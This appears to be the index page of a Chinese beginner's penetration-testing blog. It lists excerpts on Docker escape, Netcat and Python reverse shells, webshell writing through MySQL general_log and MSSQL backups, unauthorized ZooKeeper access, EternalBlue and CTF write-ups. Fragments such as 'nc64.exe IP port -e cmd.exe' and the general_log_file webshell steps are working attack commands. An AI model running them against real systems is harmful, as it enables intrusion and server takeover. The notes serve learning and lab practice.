日常笔记
包含漏洞分析,软件工具使用、笔记
努力的学渣'#
一个努力的学渣
展开
-
记一次对前端js加密的调试
很多时候登录框不再以明文的形式传输,这样就比较难对登录口进行暴力破解。前端加解密,首先看网络请求,一条一条的翻,然后看请求,看哪个url是会发生加密的。这里发现是Login!loginSystemhttp://c.biancheng.net/view/8015.html使用$.param()方法将数组或对象转化为字符串序列,以便用于 URL 查询字符串或 Ajax 请求。所以要对loginData进行搜索F12搜索loginData,一直往下搜索,发现了encrypt字眼,在23717行发现,原创 2020-11-12 09:35:55 · 1744 阅读 · 0 评论 -
信息收集之ICO
最近看到个文章https://blog.csdn.net/qq_36119192/article/details/105795647可以用shodan来搜索相同ico的站来扩大信息收集的效果甚至可以绕过cdn,ico其实就是指网页的图标例如话不多说,直接上手复现一波因为python脚本涉及到mmh3这个库,需要下载vcforpython27.msi这个文件https://www.microsoft.com/en-us/download/details.aspx?id=44266然后安装mmh原创 2020-11-02 19:58:00 · 903 阅读 · 0 评论 -
docker逃逸的简单思路笔记
判断shell是不是在docker容器里边?一般docker容器的shell都会带上上一串英文和数字(阿里云服务器也会),并且一些常见的命令并不能执行。如下Docker容器才有的命令:root@d2c06d8f5809:/# ls -alh /.dockerenvroot@d2c06d8f5809:~# cat /proc/1/cgroup正常服务器不在docker容器:Docker逃逸思路:查看docker容器ip通过循环ping找到宿主机的IP,可以得到宿主机ip为1原创 2020-10-25 17:34:18 · 451 阅读 · 0 评论 -
Powershell的学习笔记
Powershell的优点1、PowerShell可以用来管理活动目录2、Windows7以上的操作系统默认安装3、很多杀毒软件检测不到PowerShell的活动4、可以从另外一个系统中下载PowerShell脚本并执行5、cmd通常会被杀毒软件阻止运行,而PowerShell不会6、PowerShell无须写到磁盘中,它可以直接在内存中运行。Powershell的执行策略Powershell有个安全策略,默认情况下,这个执行策略会被设置受限。Get-ExecutionPolicy命令可原创 2020-10-16 14:24:13 · 4738 阅读 · 0 评论 -
Java命令执行代码
通过执行Runtime.getRuntime().exec()函数执行 calc.exe 命令package first;public class RCE2 { public static void main(String[] args) { String command1 = "calc.exe"; try { Process process = Runtime.getRuntime().exec(command1); process.waitFor(); }catch(Except原创 2020-10-07 13:08:01 · 1065 阅读 · 0 评论 -
最近碰到的未授权访问漏洞(小总结)
没有研究的太深,只是一些简单验证是否存在未授权访问漏洞的方法。zookeeper 2181端口ZooKeeper 是一个分布式的开放源码的分布式应用程序协调服务,ZooKeeper 默认开启在 2181 端口在未进行任何访问控制的情况下攻击者可通过执行 envi 命令获得系统大量的敏感信息包括系统名称Java 环境,任意用户在网络可达的情况下进行为未授权访问并读取数据甚至 kill 服务echo envi|nc ip 2181其中envi可以换stat ruok reqs dumpRsyn原创 2020-07-12 17:31:22 · 2853 阅读 · 0 评论 -
OneForAll子域名工具尝鲜
OneForAll是一款功能强大的子域收集工具OneForAll基于Python 3.8.0开发和测试,请使用高于Python 3.8.0的稳定发行版本,其他版本可能会出现一些问题(Windows平台必须使用3.8.0以上版本),安装Python环境可以参考Python 3 安装指南。项目地址和安装指南https://github.com/shmilylty/OneForAllroot@kali:~# git clone https://gitee.com/shmilylty/OneForAll.gi原创 2020-05-12 09:55:38 · 9078 阅读 · 5 评论 -
Jsonp跨域漏洞浅析
为什么要用到jsonp跨域?同源策略:协议、域名、端口都相同,是一种安全策略,不同源的客户端脚本在没有明确授权的情况下,不能读取对方资源。如何解决跨域(目前我掌握的有两种手段(1)JSONP方式(2)跨域资源共享(CORS)cors跨域漏洞浅析Json一般长这样{“name”:“aufeng”, “blog”:“https://blog.csdn.net/weixin_41598660”}它是一个非官方的协议,它允许在服务器端集成Script tags返回至客户端,通过javascript原创 2020-05-11 12:06:23 · 1231 阅读 · 0 评论 -
安全渗透常见端口及利用
原创 2019-11-25 12:36:15 · 867 阅读 · 0 评论 -
CORS跨域漏洞浅析
CORS(Cross-OriginResource Sharing,跨源资源共享)其思想是使用自定义的HTTP头部让浏览器与服务器进行沟通。因为开发者需要进行跨域进行获取资源,应用场景,在a.com,想获取b.com中的数据,常用的2种方法进行跨域一种为JSONP,一种为CORS.还有html标签也能跨域,有以下几种img, iframe,ink, script等。简单流程假设用户登陆一个...原创 2020-05-06 10:23:35 · 2366 阅读 · 0 评论 -
Mssql(sqlserver)差异备份getshell思路笔记
差异备份的概念(百度百科):备份自上一次完全备份之后有变化的数据。差异备份过程中,只备份有标记的那些选中的文件和文件夹。它不清除标记,也即备份后不标记为已备份文件。换言之,不清除存档属性。差异备份getshell条件:目标站是否存在mssql数据库注入漏洞目标站的用户是否具备sa权限、dbo权限找到网站的物理路径大概思路:假设:http://xxxxx/show.aspx?c...原创 2020-04-05 18:03:09 · 1732 阅读 · 1 评论 -
Access数据库防注入系统拿实战shell(思路笔记)
偶尔实战会碰到如下画面,但其实是有方法的。例子示范:尝试判断注入,出现防注入系统而一般数据会记录到sqlin.asp这个页面中尝试插入一句话马子,把马子url转码一下再传如图所示菜刀连接xxx.xxx.xxx.xxx/sqlin.asp...原创 2020-04-05 14:43:07 · 1741 阅读 · 0 评论 -
对sqlmap代理池配置的失败笔记
自述菜鸟实战的时候好不容易挖到注入点了,但是用尽了方法却没办法更深一步,这时候只能上sqlmap了,但是sqlmap的请求很猛,很多网站都会ban掉ip。所以想尝试一下sqlmap+代理池。原理也很简单就是将本地发出去的请求转发给代理服务器,用不同的IP去访问该目标网站。这个实现就是靠一个py的socket脚本。还有一个很关键的就是IP的代理池这里我帖上我认为比较好的教程(虽然我失败...原创 2020-04-02 15:20:14 · 1074 阅读 · 1 评论 -
端口映射后的公网反弹shell
前言:渗透一个网站最后获取该web服务器权限的时候,可能会思考,如何把公网的IP反弹到自己内网(私有ip)的虚拟机上?这时候我们就需要把内网的ip和端口映射成一个公网的ip和端口从而实现内网穿透。这里我用的是NATAPP,一个基于ngrok的国内高速内网转发工具https://natapp.cn/register首先快速注册,然后购买免费隧道(非常适合我这样的穷学生)我这里用的是TC...原创 2020-04-01 20:13:58 · 3186 阅读 · 4 评论 -
Kali安装天使之剑AngelSword,python3的poc!!
Kali安装天使之剑AngelSword 尝鲜前言: AngelSword是由python3编写的简易的cms分解检测框架。预先帮助有安全经验的安全工程师对已知的应用快速发现突破。github地址:https://github.com/Lucifer1993/AngelSwordfreebuf的介绍:https://www.freebuf.com/sectool/149883.html...原创 2020-03-18 14:06:00 · 1660 阅读 · 3 评论 -
软件加解密基础笔记
前言:根据老师的课堂笔记,和小甲鱼的视频做下的笔记。笔记:多字节数据存放顺序多字节数据存放顺序与CPU有关,微处理器中的存放顺序有正序(big-endian)和逆序(little-endian)也称大端存储和小端存储之分常见的intel系列使用的编码方式属于little-endian类;某些RISC架构的CPU,如IBM的power-pc等属于Big-ebdian类两种编码区别:例如将...原创 2020-03-05 17:55:14 · 275 阅读 · 0 评论 -
长亭xray扫描器尝鲜笔记(window版本
作为一个脚本小子,肯定离不开扫描器了安装https://github.com/chaitin/xray/releases/tag/0.19.4下载地址,我选择的是window版本的exe压缩包压缩包解压后是个exe文件我把他exe文件名修改为xray发送到桌面,然后添加一下系统变量,直接就可以点击桌面的图标打开在目标处添加修改为%windir%\system32\cmd.ex...原创 2020-03-12 22:04:48 · 9197 阅读 · 1 评论 -
部分常用反弹shell总结
为什么要使用反向 Shell目标机器在一个不同(相对攻击者而言)的私有网络目标机器的防火墙阻挡了所有入口连接(这种情况正向 Shell 是会被防火墙阻挡的)由于一些原因,你的 Payload 不能绑定在应该绑定的端口的时候你还不能确定应该选择反向 Shell 还是正向 Shell 的时候监听端IP:192.168.0.99Python靶机端python -c 'import s...原创 2020-02-21 17:20:32 · 457 阅读 · 0 评论 -
为什么不要随便点击下载链接:过时的远程病毒灰鸽子木马示范
实验环境:2003系统靶机 ip:192.168.10.1282007黑客攻击机灰鸽子软件要说的话1.灰鸽子木马是很古老的木马,早已经列入检测的范围内,即使关闭了杀软、防火墙,生成的exe病毒还是会被干掉。所以所有的步骤,最好都以虚拟机作为实验环境。2.为什么不要随便点击下载链接,因为下载内容里边很可能会携带一些木马病毒程序,一但下载,很可能会自动运行、并且受害者电脑毫无变化,但是攻...原创 2020-02-11 13:49:48 · 3996 阅读 · 3 评论 -
Linux下的base64命令使用(内含base64解密转换成图片文件
简单语法使用加密:root@kali:~# echo Hi,feng| base64SGksZmVuZwo=解密:root@kali:~# echo SGksZmVuZwo= | base64 -dHi,fengbase64解密转换成图片文件把该文件放到root目录下解密发现是png格式转换成png base64 -d a.txt > a.png,在root目录下...原创 2020-02-06 12:10:56 · 8189 阅读 · 0 评论 -
Nmap常用总结
个人使用总结nmap -T[0-5] 时间参数模板-T0:非常慢,用于IDS逃避-T1:比较慢,用于IDS逃避-T2:降低速度以降低对带宽的消耗,一般不同-T3:默认,根据目标的反应自动调整时间-T4:快速扫描,常用,需要在很好的网络环境下进行扫描,请求可能会淹没目标-T5:极速扫描,牺牲准确度-sS `半开放扫描。Nmap发送SYN包到远程主机,它不会产生任何会话.不需要通过完...原创 2020-02-06 10:09:52 · 2216 阅读 · 0 评论 -
常见的解析漏洞总结
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。Apache 换行解析漏洞其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。例子如下:正常上传.php文件上传不成功,burp抓包后发送到Repeater...原创 2020-01-30 19:24:15 · 4123 阅读 · 0 评论 -
vulnhub渗透系列之lazysysadmin
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。实验过程总结1.对端口信息扫描,得到22,80,139,445,3306,6667端口2.对22端口进行ssh爆破,发现爆破成功,其实如果爆破不成功也没有关系,因为web渗透会得到关于账号密码的信息3.爆破成功之后ssh连接,发现用户具备超级管理员...原创 2020-01-22 11:05:04 · 3846 阅读 · 2 评论 -
i春秋网络内生安全试验场CTF夺旗赛(第四季)12月赛web write up题解
题主也是个刚入门的小菜鸡,而且最近临近期末,无奈能力有限只能作出部分web题(未完待续…)题目:nani看源码有提示,构造语句读取user.phphttp://120.55.43.255:24719/index.php?file=php://filter/read=convert.base64-encode/resource=user.phpbase64解码,得出源码<?php...原创 2019-12-27 22:13:10 · 2279 阅读 · 0 评论 -
Netcat(NC)正反弹shell
Necat(NC)正反弹shellNetcat反向反弹shell目标:Win7的shell反弹到kali上kali的nc命令nc -lvp 888Win7靶机nc命令* nc64.exe IP 端口号 -e cmd.exe然后可以在kali攻击端控制目标端的win7系统Netcat正向反弹shell目标是将kali上的shell弹到win7上kali的n...原创 2020-01-07 17:06:24 · 2107 阅读 · 0 评论 -
SQL语句利用日志写shell(转载)
outfile被禁止,或者写入文件被拦截在数据库中操作如下:(必须是root权限)1.show variables like ‘%general%’; #查看配置2.set global general_log = on; #开启general log模式3.set global general_log_file = ‘/var/www/html/1.php’; #设置日志目录为shell...转载 2020-01-01 09:38:49 · 1253 阅读 · 0 评论 -
入门级简单的复现永恒之蓝(CVE-2017-0146)
入门级的复现永恒之蓝(CVE-2017-0146)实验设备与软件环境:Kali-2016系统 IP:192.168.10.140Win7系统 IP:192.168.10.132 开放端口:445MSF框架版本:5.0.59版本开始练手信息收集: Kali先进入msfconsle,然后用nmap -sV 192.168.10.132 扫描win7...原创 2019-12-21 16:33:06 · 1815 阅读 · 0 评论